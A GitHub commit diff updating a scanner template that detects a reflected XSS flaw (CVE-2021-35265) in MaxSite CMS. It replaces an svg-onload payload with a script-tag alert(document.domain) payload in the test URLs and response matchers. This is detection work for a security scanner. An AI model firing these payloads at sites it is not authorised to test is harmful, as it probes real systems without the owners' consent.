Update CVE-2021-35265.yaml

patch-1
Prince Chaddha 2021-09-16 22:31:41 +05:30 committed by GitHub
parent 3ca80153b3
commit d3c6985d3e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 6 deletions

View File

@ -4,7 +4,7 @@ info:
name: MaxSite CMS XSS
author: pikpikcu
severity: medium
description: reflected cross-site scripting (XSS) vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page.
description: Reflected cross-site scripting (XSS) vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page.
reference:
- https://github.com/maxsite/cms/issues/414#issue-726249183
- https://nvd.nist.gov/vuln/detail/CVE-2021-35265
@ -13,21 +13,21 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E'
- '{{BaseURL}}/maxsite/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E'
- '{{BaseURL}}/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/maxsite/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- '"><svg/onload=alert(document.domain)>'
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
words:
- 'Content-Type: text/html'
part: header
words:
- text/html
- type: status
status: